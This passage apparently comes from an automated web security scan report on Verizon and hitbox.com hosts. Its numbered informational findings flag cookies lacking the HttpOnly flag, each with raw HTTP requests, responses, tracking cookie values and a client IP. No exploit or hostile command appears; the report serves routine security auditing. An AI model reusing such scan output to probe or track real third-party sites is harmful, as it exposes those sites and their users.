vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N

Response

HTTP/1.1 404 Not Found
Set-Cookie: cq5ublish-cookie=sjpcq5web1; path=/
Date: Mon, 05 Sep 2011 22:42:15 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 359
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /jsps/devCenters/Smart_Phone/Landing_Pages/AppendixIC
...[SNIP]...

10.25. http://download.verizon.net/surround/media/misc/images/vidplayer_black_530x272.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.verizon.net
Path:	/surround/media/misc/images/vidplayer_black_530x272.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

AkaUTrackingID=D39DBB1D9AAFA74641702E55CE620E29; expires=Sat, 08-Sep-2018 22:42:16 GMT; path=/; domain=verizon.net
AkaSTrackingID=9D33249FECAD5AA85EEBAA50ED9C9B53; path=/; domain=verizon.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /surround/media/misc/images/vidplayer_black_530x272.jpg HTTP/1.1
Host: download.verizon.net
Proxy-Connection: keep-alive
Referer: http://media.verizon.com/media/widgets/NewsCenter/flash/NewsCenterPlayer.swf?version=5&_rand=1315280536325
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=03; lob=webmail; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Content-Length: 11349
Content-Type: image/jpeg
Last-Modified: Wed, 08 Sep 2010 22:58:18 GMT
Accept-Ranges: bytes
ETag: "491cd453a94fcb1:600"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:42:16 GMT
Connection: close
Set-Cookie: AkaUTrackingID=D39DBB1D9AAFA74641702E55CE620E29; expires=Sat, 08-Sep-2018 22:42:16 GMT; path=/; domain=verizon.net
Set-Cookie: AkaSTrackingID=9D33249FECAD5AA85EEBAA50ED9C9B53; path=/; domain=verizon.net

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
. .

.....
...........................

..................................................................
...[SNIP]...

10.26. http://ehg-verizon.hitbox.com/HG previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ehg-verizon.hitbox.com
Path:	/HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DM560507E4AMV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrz%BBQ"%X%QBe%Xrez%X%QBe%Xre"%X%QBeBQX%"%X%QBe%XrerCrCri"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:42:11 GMT; max-age=31536000
DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrz%Q^Q"%X%QBer^Xez%X%QBer^Xe"%X%QBeBQX%"%X%QBer^Xer@rQe@"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:42:11 GMT; max-age=31536000
DM56050737WDV6=V1rrrrr"rz%X%QBeBQXr@Cre%ez%zrz%"%X%QBeBQXrz%X%QBeBQXr"%X%QBeBQX%"%X%QBeBQXr@Cre%e"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6@%zA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:42:11 GMT; max-age=31536000
WSS_GW=V1z%X%QBXC@CQ; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:42:11 GMT; max-age=31536000
CTG=1315262531; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:42:11 GMT; max-age=604800

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM550928B8DM%3BDM56050737WD%3BDM560507E4AM&hec=1&vjs=HBX0250.11u&vpc=ERR&ec=1&err=Unknown HTTP/1.1
Host: ehg-verizon.hitbox.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DM560507CPCFV6=V1eB(#X"rz%X%QBer^Xer@rQe@z%zrzCC"%X%QBer^Xez%X%QBer^Xe"%X%QBer^ir"%X%QBer^Xer@rQe@"%@z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; DM560507E4AMV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrzr"%X%QBe%Xrez%X%QBe%Xre"%X%QBe%Xre"%X%QBe%XrerCrCri"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; DM580820OHACV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrzr"%X%QBe%Xrez%X%QBe%Xre"%X%QBe%Xre"%X%QBe%XrerCrCr^"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; DM5605079NESV6=V1rrrrr"rz%X%QBe%XBQrBrCBXz%zrzr"%X%QBe%XBQz%X%QBe%XBQ"%X%QBe%XBQ"%X%QBe%XBQrBrCBX"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%XzA6DTdT:kTHGIWaoF9; DM560507I8NCV6=V1rrrrr"rz%X%QBe%%%Xrirr%rz%zrz%BC^"%X%QBe%%%Xz%X%QBe%%%X"%X%QBeBXeB"%X%QBe%%%Xrirr%r"QCz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6XrzA6DTdT:kTHGIWaoF9; DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrz%Ce%"%X%QBer^Xez%X%QBer^Xe"%X%QBeBX^@"%X%QBer^Xer@rQe@"XQz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; WSS_GW=V1z%X%QBXC@CQ; CTG=1315262397; DM560905OCSMV6=V1rrrrr"rz%X%QBe%CQr%%r^iQz%zrz^C@"%X%QBe%CQrz%X%QBe%CQr"%X%QBeBX^@"%X%QBe%CQr%%r^iQ"@i@z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6Q%zA6DTdT:kTHGIWaoF9

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:42:11 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM560507E4AMV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrz%BBQ"%X%QBe%Xrez%X%QBe%Xre"%X%QBeBQX%"%X%QBe%XrerCrCri"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:42:11 GMT; max-age=31536000
Set-Cookie: DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrz%Q^Q"%X%QBer^Xez%X%QBer^Xe"%X%QBeBQX%"%X%QBer^Xer@rQe@"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:42:11 GMT; max-age=31536000
Set-Cookie: DM56050737WDV6=V1rrrrr"rz%X%QBeBQXr@Cre%ez%zrz%"%X%QBeBQXrz%X%QBeBQXr"%X%QBeBQX%"%X%QBeBQXr@Cre%e"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6@%zA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:42:11 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QBXC@CQ; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:42:11 GMT; max-age=31536000
Set-Cookie: CTG=1315262531; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:42:11 GMT; max-age=604800
nnCoection: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Mon, 05 Sep 2011 22:42:12 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.27. http://ehg-verizon.hitbox.com/HG previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ehg-verizon.hitbox.com
Path:	/HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DM560507E4AMV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrz%Be^"%X%QBe%Xrez%X%QBe%Xre"%X%QBeBQ@Q"%X%QBe%XrerCrCri"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:42:55 GMT; max-age=31536000
DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrz%eX^"%X%QBer^Xez%X%QBer^Xe"%X%QBeBQ@Q"%X%QBer^Xer@rQe@"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:42:55 GMT; max-age=31536000
WSS_GW=V1z%X%QBXC@CQ; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:42:55 GMT; max-age=31536000
CTG=1315262575; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:42:55 GMT; max-age=604800
DM5605070DMBV6=V1rrrrr"rz%X%QBeBQ@C^%r@Qez%zrz%"%X%QBeBQ@Cz%X%QBeBQ@C"%X%QBeBQ@Q"%X%QBeBQ@C^%r@Qe"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%%@zA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:42:55 GMT; max-age=31536000

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM550928B8DM%3BDM5605070DMB%3BDM560507E4AM&hec=1&vjs=HBX0250.11u&vpc=ERR&ec=1&err=Unknown HTTP/1.1
Host: ehg-verizon.hitbox.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DM560507CPCFV6=V1eB(#X"rz%X%QBer^Xer@rQe@z%zrzCC"%X%QBer^Xez%X%QBer^Xe"%X%QBer^ir"%X%QBer^Xer@rQe@"%@z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; DM580820OHACV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrzr"%X%QBe%Xrez%X%QBe%Xre"%X%QBe%Xre"%X%QBe%XrerCrCr^"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; DM5605079NESV6=V1rrrrr"rz%X%QBe%XBQrBrCBXz%zrzr"%X%QBe%XBQz%X%QBe%XBQ"%X%QBe%XBQ"%X%QBe%XBQrBrCBX"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%XzA6DTdT:kTHGIWaoF9; DM560507I8NCV6=V1rrrrr"rz%X%QBe%%%Xrirr%rz%zrz%BC^"%X%QBe%%%Xz%X%QBe%%%X"%X%QBeBXeB"%X%QBe%%%Xrirr%r"QCz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6XrzA6DTdT:kTHGIWaoF9; DM560905OCSMV6=V1rrrrr"rz%X%QBe%CQr%%r^iQz%zrz^C@"%X%QBe%CQrz%X%QBe%CQr"%X%QBeBX^@"%X%QBe%CQr%%r^iQ"@i@z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6Q%zA6DTdT:kTHGIWaoF9; DM560507E4AMV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrz%BBC"%X%QBe%Xrez%X%QBe%Xre"%X%QBeBQXr"%X%QBe%XrerCrCri"%BBCz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; DM56050737WDV6=V1rrrrr"rz%X%QBeBQXr@Cre%ez%zrzr"%X%QBeBQXrz%X%QBeBQXr"%X%QBeBQXr"%X%QBeBQXr@Cre%e"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6@%zA6DTdT:kTHGIWaoF9; DM56050762VVV6=V1rrrrr"rz%X%QBeBQCCr^riB^z%zrzr"%X%QBeBQCCz%X%QBeBQCC"%X%QBeBQCC"%X%QBeBQCCr^riB^"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6CzA6DTdT:kTHGIWaoF9; DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrz%eri"%X%QBer^Xez%X%QBer^Xe"%X%QBeBQCC"%X%QBer^Xer@rQe@"%Cz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; WSS_GW=V1z%X%QBXC@CQ; CTG=1315262544

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:42:55 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM560507E4AMV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrz%Be^"%X%QBe%Xrez%X%QBe%Xre"%X%QBeBQ@Q"%X%QBe%XrerCrCri"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:42:55 GMT; max-age=31536000
Set-Cookie: DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrz%eX^"%X%QBer^Xez%X%QBer^Xe"%X%QBeBQ@Q"%X%QBer^Xer@rQe@"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:42:55 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QBXC@CQ; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:42:55 GMT; max-age=31536000
Set-Cookie: CTG=1315262575; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:42:55 GMT; max-age=604800
Set-Cookie: DM5605070DMBV6=V1rrrrr"rz%X%QBeBQ@C^%r@Qez%zrz%"%X%QBeBQ@Cz%X%QBeBQ@C"%X%QBeBQ@Q"%X%QBeBQ@C^%r@Qe"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%%@zA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:42:55 GMT; max-age=31536000
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Mon, 05 Sep 2011 22:42:56 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.28. http://ehg-verizon.hitbox.com/HG previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ehg-verizon.hitbox.com
Path:	/HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DM550928B8DMV6=V1rrrrr"rz%X%QBeriBr%QrXeez%zrzr"%X%QBeriBrz%X%QBeriBr"%X%QBeriBr"%X%QBeriBr%QrXee"rz(xB$qUxB$O:maxB$haF2_aTf2I~xB$h:Df2TWxBrGIWaz7}z)OuKr6iBzA6qU6O:ma6haF2_aTf2I~6h:Df2TWHGIWazOffGxXjxB$xB$kkkxB(7Idaha7ahhah_:m2TIf:hxB(c:mxB$ha7ahhahYIfO#ImaxX$ya7YIh#ImaxX[ya7]I~Da; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:13:40 GMT; max-age=31536000
DM560507CPCFV6=V1eB(#X"rz%X%QBeriBr%QrXeez%zrzr"%X%QBeriBrz%X%QBeriBr"%X%QBeriBr"%X%QBeriBr%QrXee"rz(xB$qUxB$O:maxB$haF2_aTf2I~xB$h:Df2TWxBrGIWaz7}z)OuKr6iBzA6qU6O:ma6haF2_aTf2I~6h:Df2TWHGIWazOffGxXjxB$xB$kkkxB(7Idaha7ahhah_:m2TIf:hxB(c:mxB$ha7ahhahYIfO#ImaxX$ya7YIh#ImaxX[ya7]I~Da; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:13:40 GMT; max-age=31536000
WSS_GW=V1z%X%QBeriBr; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:13:40 GMT; max-age=31536000
CTG=1315260820; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:13:40 GMT; max-age=604800

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM550928B8DM%3BDM560507CPCF62EN3&cd=1&hv=6&n=/routing+page&con=&vcon=/vz/home/residential&tt=auto&ja=y&dt=22&zo=300&lm=1315278819000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&np=Win32&nc=Windows%20NT%206.1&vpc=HBX0200u&vjs=HBX0250.11u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&ttt=lid,lpos,name&ra=&rf=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pu=&pl=Mozilla%20Default%20Plug-in%3AGoogle%20Update%3AiTunes%20Application%20Detector%3AGoogle%20Earth%20Plugin%3AJava%28TM%29%20Platform%20SE%206%20U26%3AJava%20Deployment%20Toolkit%206.0.260.3%3ASilverlight%20Plug-In%3AMicrosoft%20Office%202010%3AMicrosoft%20Office%202010%3AWPI%20Detector%201.4%3AGoogle%20Updater%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3AQuickTime%20Plug-in%207.7%3A&lv.id=vzw_home,vzw_home,res_home,res_home,bus_home,bus_home,corp_vz,corp_vzw,hp_res_footer_about_us,hp_res_footer_contact_us,hp_res_footer_store_locator,hp_res_footer_careers,hp_bus_footer_vzthinkfinity,hp_res_footer_sitemap,hp_res_footer_privacy_policy,hp_res_footer_terms_conditions,hp_res_footer_site_feedback,&lv.pos=,,,,,,,,,,,,,,,,,&hid=0.22088988668371046 HTTP/1.1
Host: ehg-verizon.hitbox.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/verizonglobalhome/ghp_landing.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:13:40 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM550928B8DMV6=V1rrrrr"rz%X%QBeriBr%QrXeez%zrzr"%X%QBeriBrz%X%QBeriBr"%X%QBeriBr"%X%QBeriBr%QrXee"rz(xB$qUxB$O:maxB$haF2_aTf2I~xB$h:Df2TWxBrGIWaz7}z)OuKr6iBzA6qU6O:ma6haF2_aTf2I~6h:Df2TWHGIWazOffGxXjxB$xB$kkkxB(7Idaha7ahhah_:m2TIf:hxB(c:mxB$ha7ahhahYIfO#ImaxX$ya7YIh#ImaxX[ya7]I~Da; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:13:40 GMT; max-age=31536000
Set-Cookie: DM560507CPCFV6=V1eB(#X"rz%X%QBeriBr%QrXeez%zrzr"%X%QBeriBrz%X%QBeriBr"%X%QBeriBr"%X%QBeriBr%QrXee"rz(xB$qUxB$O:maxB$haF2_aTf2I~xB$h:Df2TWxBrGIWaz7}z)OuKr6iBzA6qU6O:ma6haF2_aTf2I~6h:Df2TWHGIWazOffGxXjxB$xB$kkkxB(7Idaha7ahhah_:m2TIf:hxB(c:mxB$ha7ahhahYIfO#ImaxX$ya7YIh#ImaxX[ya7]I~Da; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:13:40 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QBeriBr; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:13:40 GMT; max-age=31536000
Set-Cookie: CTG=1315260820; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:13:40 GMT; max-age=604800
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Mon, 05 Sep 2011 22:13:41 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.29. http://ehg-verizon.hitbox.com/HG previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ehg-verizon.hitbox.com
Path:	/HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DM560507E4AMV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrzr"%X%QBe%Xrez%X%QBe%Xre"%X%QBe%Xre"%X%QBe%XrerCrCri"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:21:46 GMT; max-age=31536000
DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrzX@r"%X%QBer^Xez%X%QBer^Xe"%X%QBe%Xre"%X%QBer^Xer@rQe@"%^%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:21:46 GMT; max-age=31536000
DM580820OHACV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrzr"%X%QBe%Xrez%X%QBe%Xre"%X%QBe%Xre"%X%QBe%XrerCrCr^"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:21:46 GMT; max-age=31536000
WSS_GW=V1z%X%QBXC@CQ; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:21:46 GMT; max-age=31536000
CTG=1315261306; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:21:46 GMT; max-age=604800

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM550928B8DM%3BDM560507E4AM%3BDM580820OHAC&hec=1&vjs=HBX0250.11u&vpc=ERR&ec=1&err=Unknown HTTP/1.1
Host: ehg-verizon.hitbox.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DM560507CPCFV6=V1eB(#X"rz%X%QBer^Xer@rQe@z%zrzCC"%X%QBer^Xez%X%QBer^Xe"%X%QBer^ir"%X%QBer^Xer@rQe@"%@z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrz%@^"%X%QBer^Xez%X%QBer^Xe"%X%QBe%%%Q"%X%QBer^Xer@rQe@"Bz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; WSS_GW=V1z%X%QBXC@CQ; DM560507I8NCV6=V1rrrrr"rz%X%QBe%%%Xrirr%rz%zrzB"%X%QBe%%%Xz%X%QBe%%%X"%X%QBe%%%Q"%X%QBe%%%Xrirr%r"Bz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6XrzA6DTdT:kTHGIWaoF9; CTG=1315261115

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:21:46 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM560507E4AMV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrzr"%X%QBe%Xrez%X%QBe%Xre"%X%QBe%Xre"%X%QBe%XrerCrCri"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:21:46 GMT; max-age=31536000
Set-Cookie: DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrzX@r"%X%QBer^Xez%X%QBer^Xe"%X%QBe%Xre"%X%QBer^Xer@rQe@"%^%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:21:46 GMT; max-age=31536000
Set-Cookie: DM580820OHACV6=V1rrrrr"rz%X%QBe%XrerCrCriz%zrzr"%X%QBe%Xrez%X%QBe%Xre"%X%QBe%Xre"%X%QBe%XrerCrCr^"rz(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:21:46 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%X%QBXC@CQ; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:21:46 GMT; max-age=31536000
Set-Cookie: CTG=1315261306; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:21:46 GMT; max-age=604800
nnCoection: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Mon, 05 Sep 2011 22:21:47 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

10.30. http://ehg-verizon.hitbox.com/HG previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ehg-verizon.hitbox.com
Path:	/HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DM550928B8DMV6=V1rrrrr"rz%X%QBer^Xer@rQe@z%zrzQ%Q"%X%QBer^Xez%X%QBer^Xe"%X%QBe%CQ%"%X%QBer^Xer@rQe@"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6BrzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-verizon.hitbox.com; expires=Tue, 04-Sep-2012 22:24:11 GMT; max-age=31536000
WSS_GW=V1z%X%QBXC@CQ; path=/; domain=.hitbox.com; expires=Tue, 04-Sep-2012 22:24:11 GMT; max-age=31536000
CTG=1315261451; path=/; domain=.hitbox.com; expires=Mon, 12-Sep-2011 22:24:11 GMT; max-age=604800
